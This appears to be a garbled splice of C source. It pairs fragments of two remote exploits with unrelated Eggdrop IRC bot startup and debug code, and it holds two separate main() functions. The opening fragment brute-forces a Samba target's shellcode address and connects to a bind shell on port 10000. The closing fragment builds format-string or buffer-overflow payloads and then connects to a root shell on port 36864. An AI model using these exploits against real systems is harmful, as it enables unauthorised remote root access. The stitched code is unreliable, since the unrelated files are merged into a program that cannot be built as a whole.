fprintf(stdout," **\n ** OK, It's good selection, Attack tries %d times.\n",BRUTE_AT);
fprintf(stdout," ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n");
fprintf(stdout," [*] Brute-Force mode:\n\n");
fprintf(stdout," |----+----+----+----+----+----+----+----+----+----+----+----+----|");
fprintf(stdout,"\n |");
for(brute_f=0;brute_f<BRUTE_AT;brute_f++)
{
fflush(stdout);
fprintf(stdout,"=");
shell+=(0x100);
sock=(int)setsock(tg_host,ATK_PORT);
if((int)re_connt(sock,0)==-1)
{
while(!(brute_f>=BRUTE_AT-1))
{
fprintf(stdout,"=");
brute_f++;
}
fprintf(stdout,"|\n\n");
fprintf(stderr," [-] Connect Failed.\n\n");
exit(-1);
}
__atk_code_send_recv(sock,shell);
close(sock);
sleep(2);
sock=(int)setsock(tg_host,SH_PORT);
if((int)re_connt(sock,0)==-1)
{
continue;
}
while(!(brute_f>=BRUTE_AT-1))
{
fprintf(stdout,"=");
brute_f++;
}
fprintf(stdout,"|\n\n");
fprintf(stdout," [+] Shellcode address: %p\n",shell);
fprintf(stdout," [*] Brute-Force end !!\n\n");
fprintf(stdout," **\n ** Bind shellcode is port 10000.\n");
fprintf(stdout," ** If bindshell port number was changed, change connection port.\n **\n\n");
(void)send_recv_sh(sock);
}
fprintf(stdout,"|\n\n **\n");
fprintf(stdout," ** Brute-Force exploit failed. Reason is simple.\n **\n");
fprintf(stdout," ** Could not search shellcode's position during %d times.\n",BRUTE_AT);
fprintf(stdout," ** Or, Operating System's target that we attack isn't.\n");
fprintf(stdout," ** OOops ! is server Samba version doubtful ??\n **\n\n");
exit(-1);
}
else
{
fprintf(stdout," [0] Target: %s\n",plat[type].ost);
fprintf(stdout," [1] Set socket.\n");
sock=(int)setsock(tg_host,ATK_PORT);
(int)re_connt(sock,1);
fprintf(stdout," [2] Make shellcode & Send Packet.\n");
__atk_code_send_recv(sock,shell);
close(sock);
fprintf(stdout," [3] Trying %s:%d.\n",tg_host,SH_PORT);
sleep(2);
sock=(int)setsock(tg_host,SH_PORT);
(int)re_connt(sock,1);
fprintf(stdout," [*] Connected to %s:%d.\n",tg_host,SH_PORT);
(void)send_recv_sh(sock);
}
}
int main(int arg_c, char **arg_v)
{
int i, xx;
char s[25];
FILE *f;
struct sigaction sv;
struct chanset_t *chan;
#ifdef DEBUG
struct rlimit cdlim;
#endif
#ifdef STOP_UAC
int nvpair[2];
#endif
/* Make sure it can write core, if you make debug. Else it's pretty
* useless (dw)
*
* Only allow unlimited size core files when compiled with DEBUG defined.
* This is not a good idea for normal builds -- in these cases, use the
* default system resource limits instead.
*/
#ifdef DEBUG
cdlim.rlim_cur = RLIM_INFINITY;
cdlim.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &cdlim);
#endif
#ifdef DEBUG_CONTEXT
/* Initialise context list */
for (i = 0; i < 16; i++)
Context;
#endif
/* Include patch.h header for patch("...") */
#include "patch.h"
argc = arg_c;
argv = arg_v;
/* Version info! */
egg_snprintf(ver, sizeof ver, "eggdrop v%s", egg_version);
egg_snprintf(version, sizeof version,
"Eggdrop v%s (C) 1997 Robey Pointer (C) 2010 Eggheads",
egg_version);
/* Now add on the patchlevel (for Tcl) */
sprintf(&egg_version[strlen(egg_version)], " %u", egg_numver);
strcat(egg_version, egg_xtra);
/* For OSF/1 */
#ifdef STOP_UAC
/* Don't print "unaligned access fixup" warning to the user */
nvpair[0] = SSIN_UACPROC;
nvpair[1] = UAC_NOPRINT;
setsysinfo(SSI_NVPAIRS, (char *) nvpair, 1, NULL, 0);
#endif
/* Set up error traps: */
sv.sa_handler = got_bus;
sigemptyset(&sv.sa_mask);
#ifdef SA_RESETHAND
sv.sa_flags = SA_RESETHAND;
#else
sv.sa_flags = 0;
#endif
sigaction(SIGBUS, &sv, NULL);
sv.sa_handler = got_segv;
sigaction(SIGSEGV, &sv, NULL);
#ifdef SA_RESETHAND
sv.sa_flags = 0;
#endif
sv.sa_handler = got_fpe;
sigaction(SIGFPE, &sv, NULL);
sv.sa_handler = got_term;
sigaction(SIGTERM, &sv, NULL);
sv.sa_handler = got_hup;
sigaction(SIGHUP, &sv, NULL);
sv.sa_handler = got_quit;
sigaction(SIGQUIT, &sv, NULL);
sv.sa_handler = SIG_IGN;
sigaction(SIGPIPE, &sv, NULL);
sv.sa_handler = got_ill;
sigaction(SIGILL, &sv, NULL);
sv.sa_handler = got_alarm;
sigaction(SIGALRM, &sv, NULL);
/* Initialize variables and stuff */
now = time(NULL);
chanset = NULL;
egg_memcpy(&nowtm, localtime(&now), sizeof(struct tm));
lastmin = nowtm.tm_min;
srandom((unsigned int) (now % (getpid() + getppid())));
init_mem();
init_language(1);
if (argc > 1)
for (i = 1; i < argc; i++)
do_arg(argv[i]);
printf("\n%s\n", version);
#ifndef CYGWIN_HACKS
/* Don't allow eggdrop to run as root
* This check isn't useful under cygwin and has been
* reported to cause trouble in some situations.
*/
if (((int) getuid() == 0) || ((int) geteuid() == 0))
fatal("ERROR: Eggdrop will not run as root!", 0);
#endif
#ifndef REPLACE_NOTIFIER
init_threaddata(1);
#endif
init_userent();
init_misc();
init_bots();
init_modules();
if (backgrd)
bg_prepare_split();
init_tcl(argc, argv);
init_language(0);
#ifdef STATIC
link_statics();
#endif
strncpyz(s, ctime(&now), sizeof s);
strcpy(&s[11], &s[20]);
putlog(LOG_ALL, "*", "--- Loading %s (%s)", ver, s);
chanprog();
if (!encrypt_pass) {
printf(MOD_NOCRYPT);
bg_send_quit(BG_ABORT);
exit(1);
}
i = 0;
for (chan = chanset; chan; chan = chan->next)
i++;
putlog(LOG_MISC, "*", "=== %s: %d channels, %d users.",
botnetnick, i, count_users(userlist));
#ifdef TLS
ssl_init();
#endif
cache_miss = 0;
cache_hit = 0;
if (!pid_file[0])
egg_snprintf(pid_file, sizeof pid_file, "pid.%s", botnetnick);
/* Check for pre-existing eggdrop! */
f = fopen(pid_file, "r");
if (f != NULL) {
fgets(s, 10, f);
xx = atoi(s);
i = kill(xx, SIGCHLD); /* Meaningless kill to determine if pid
* is used */
if (i == 0 || errno != ESRCH) {
printf(EGG_RUNNING1, botnetnick);
printf(EGG_RUNNING2, pid_file);
bg_send_quit(BG_ABORT);
exit(1);
}
}
/* Move into background? */
if (backgrd) {
bg_do_split();
} else { /* !backgrd */
xx = getpid();
if (xx != 0) {
FILE *fp;
/* Write pid to file */
unlink(pid_file);
fp = fopen(pid_file, "w");
if (fp != NULL) {
fprintf(fp, "%u\n", xx);
if (fflush(fp)) {
/* Let the bot live since this doesn't appear to be a botchk */
printf(EGG_NOWRITE, pid_file);
fclose(fp);
unlink(pid_file);
} else
fclose(fp);
} else
printf(EGG_NOWRITE, pid_file);
}
}
use_stderr = 0; /* Stop writing to stderr now */
if (backgrd) {
/* Ok, try to disassociate from controlling terminal (finger cross) */
#ifdef HAVE_SETPGID
setpgid(0, 0);
#endif
/* Tcl wants the stdin, stdout and stderr file handles kept open. */
freopen("/dev/null", "r", stdin);
freopen("/dev/null", "w", stdout);
freopen("/dev/null", "w", stderr);
#ifdef CYGWIN_HACKS
FreeConsole();
#endif
}
/* Terminal emulating dcc chat */
if (!backgrd && term_z) {
int n = new_dcc(&DCC_CHAT, sizeof(struct chat_info));
getvhost(&dcc[n].sockname, AF_INET);
dcc[n].sock = STDOUT;
dcc[n].timeval = now;
dcc[n].u.chat->con_flags = conmask;
dcc[n].u.chat->strip_flags = STRIP_ALL;
dcc[n].status = STAT_ECHO;
strcpy(dcc[n].nick, "HQ");
strcpy(dcc[n].host, "llama@console");
/* HACK: Workaround not to pass literal "HQ" as a non-const arg */
dcc[n].user = get_user_by_handle(userlist, dcc[n].nick);
/* Make sure there's an innocuous HQ user if needed */
if (!dcc[n].user) {
userlist = adduser(userlist, dcc[n].nick, "none", "-", USER_PARTY);
dcc[n].user = get_user_by_handle(userlist, dcc[n].nick);
}
setsock(STDOUT, 0); /* Entry in net table */
dprintf(n, "\n### ENTERING DCC CHAT SIMULATION ###\n\n");
dcc_chatter(n);
}
then = now;
online_since = now;
autolink_cycle(NULL); /* Hurry and connect to tandem bots */
add_help_reference("cmds1.help");
add_help_reference("cmds2.help");
add_help_reference("core.help");
add_hook(HOOK_SECONDLY, (Function) core_secondly);
add_hook(HOOK_MINUTELY, (Function) core_minutely);
add_hook(HOOK_HOURLY, (Function) core_hourly);
add_hook(HOOK_REHASH, (Function) event_rehash);
add_hook(HOOK_PRE_REHASH, (Function) event_prerehash);
add_hook(HOOK_USERFILE, (Function) event_save);
add_hook(HOOK_BACKUP, (Function) backup_userfile);
add_hook(HOOK_DAILY, (Function) event_logfile);
add_hook(HOOK_DAILY, (Function) event_resettraffic);
add_hook(HOOK_LOADED, (Function) event_loaded);
call_hook(HOOK_LOADED);
debug0("main: entering loop");
while (1) {
mainloop(1);
}
}
static void write_debug()
{
int x;
char s[25];
int y;
if (nested_debug) {
/* Yoicks, if we have this there's serious trouble!
* All of these are pretty reliable, so we'll try these.
*
* NOTE: dont try and display context-notes in here, it's
* _not_ safe <cybah>
*/
x = creat("DEBUG.DEBUG", 0644);
setsock(x, SOCK_NONSOCK);
if (x >= 0) {
strncpyz(s, ctime(&now), sizeof s);
dprintf(-x, "Debug (%s) written %s\n", ver, s);
dprintf(-x, "Please report problem to [email protected]\n");
dprintf(-x, "after a visit to http://www.eggheads.org/bugzilla/\n");
dprintf(-x, "Full Patch List: %s\n", egg_xtra);
dprintf(-x, "Context: ");
cx_ptr = cx_ptr & 15;
for (y = ((cx_ptr + 1) & 15); y != cx_ptr; y = ((y + 1) & 15))
dprintf(-x, "%s/%d,\n ", cx_file[y], cx_line[y]);
dprintf(-x, "%s/%d\n\n", cx_file[y], cx_line[y]);
killsock(x);
close(x);
}
bg_send_quit(BG_ABORT);
exit(1); /* Dont even try & tell people about, that may
* have caused the fault last time. */
} else
nested_debug = 1;
putlog(LOG_MISC, "*", "* Last context: %s/%d [%s]", cx_file[cx_ptr],
cx_line[cx_ptr], cx_note[cx_ptr][0] ? cx_note[cx_ptr] : "");
putlog(LOG_MISC, "*", "* Please REPORT this BUG!");
putlog(LOG_MISC, "*", "* Check doc/BUG-REPORT on how to do so.");
x = creat("DEBUG", 0644);
setsock(x, SOCK_NONSOCK);
if (x < 0) {
putlog(LOG_MISC, "*", "* Failed to write DEBUG");
} else {
strncpyz(s, ctime(&now), sizeof s);
dprintf(-x, "Debug (%s) written %s\n", ver, s);
dprintf(-x, "Full Patch List: %s\n", egg_xtra);
#ifdef STATIC
dprintf(-x, "STATICALLY LINKED\n");
#endif
/* info library */
dprintf(-x, "Tcl library: %s\n",
((interp) && (Tcl_Eval(interp, "info library") == TCL_OK)) ?
tcl_resultstring() : "*unknown*");
/* info tclversion/patchlevel */
dprintf(-x, "Tcl version: %s (header version %s)\n",
((interp) && (Tcl_Eval(interp, "info patchlevel") == TCL_OK)) ?
tcl_resultstring() : (Tcl_Eval(interp, "info tclversion") == TCL_OK) ?
tcl_resultstring() : "*unknown*", TCL_PATCH_LEVEL ? TCL_PATCH_LEVEL :
"*unknown*");
if (tcl_threaded())
dprintf(-x, "Tcl is threaded\n");
#ifdef IPV6
dprintf(-x, "Compiled with IPv6 support\n");
#else
dprintf(-x, "Compiled without IPv6 support\n");
#endif
#ifdef TLS
dprintf(-x, "Compiled with TLS support\n");
#else
dprintf(-x, "Compiled without TLS support\n");
#endif
dprintf(-x, "Configure flags: %s\n", EGG_AC_ARGS);
#ifdef CCFLAGS
dprintf(-x, "Compile flags: %s\n", CCFLAGS);
#endif
#ifdef LDFLAGS
dprintf(-x, "Link flags: %s\n", LDFLAGS);
#endif
#ifdef STRIPFLAGS
dprintf(-x, "Strip flags: %s\n", STRIPFLAGS);
#endif
dprintf(-x, "Context: ");
cx_ptr = cx_ptr & 15;
for (y = ((cx_ptr + 1) & 15); y != cx_ptr; y = ((y + 1) & 15))
dprintf(-x, "%s/%d, [%s]\n ", cx_file[y], cx_line[y],
(cx_note[y][0]) ? cx_note[y] : "");
dprintf(-x, "%s/%d [%s]\n\n", cx_file[cx_ptr], cx_line[cx_ptr],
(cx_note[cx_ptr][0]) ? cx_note[cx_ptr] : "");
tell_dcc(-x);
dprintf(-x, "\n");
debug_mem_to_dcc(-x);
killsock(x);
close(x);
putlog(LOG_MISC, "*", "* Wrote DEBUG");
}
}
int main(int argc,char *argv[])
{
int sock,type=0;
int port=(PORT);
char host[256]=DEF_HOST;
int sflag=platform[type].sflag;
unsigned long retloc=platform[type].dtors_addr;
unsigned long shell=platform[type].shell;
(void)banrl();
while((sock=getopt(argc,argv,"DdF:f:R:r:S:s:H:h:T:t:Ii"))!=EOF) {
extern char *optarg;
switch(sock) {
case 'D':
case 'd':
__debug_chk=1;
break;
case 'R':
case 'r':
retloc=strtoul(optarg,NULL,0);
break;
case 'S':
case 's':
shell=strtoul(optarg,NULL,0);
break;
case 'F':
case 'f':
sflag=atoi(optarg);
break;
case 'H':
case 'h':
memset((char *)host,0,sizeof(host));
strncpy(host,optarg,sizeof(host)-1);
break;
case 'T':
case 't':
type=atoi(optarg);
if(type>=4){
(void)usage(argv[0]);
} else {
retloc=platform[type].dtors_addr;
shell=platform[type].shell;
sflag=platform[type].sflag;
}
break;
case 'I':
case 'i':
(void)usage(argv[0]);
break;
case '?':
fprintf(stderr,"Try `%s -i' for more information.\n\n",argv[0]);
exit(-1);
break;
}
}
fprintf(stdout," #\n # target host: %s:%d\n",host,port);
fprintf(stdout," # type: %s\n",platform[type].os_type);
switch(type)
{
case 0:
case 1:
(int)make_fmt_code(retloc,shell,sflag);
break;
case 2:
(int)make_bof_code(shell,sflag,0);
break;
case 3:
(int)make_bof_code(shell,sflag,1);
}
fprintf(stdout," # send code size: %d byte\n",strlen(t_atk));
sock=setsock(host,port);
(void)re_connt(sock);
if(__debug_chk) sleep(10);
send(sock,t_atk,strlen(t_atk),0);
close(sock);
fprintf(stdout," #\n # Waiting rootshell, Trying %s:36864 ...\n",host);
sleep(1);
sock=setsock(host,36864);
(void)re_connt(sock);
fprintf(stdout," # connected to %s:36864 !\n #\n\n",host);
(void)conn_shell(sock);
}
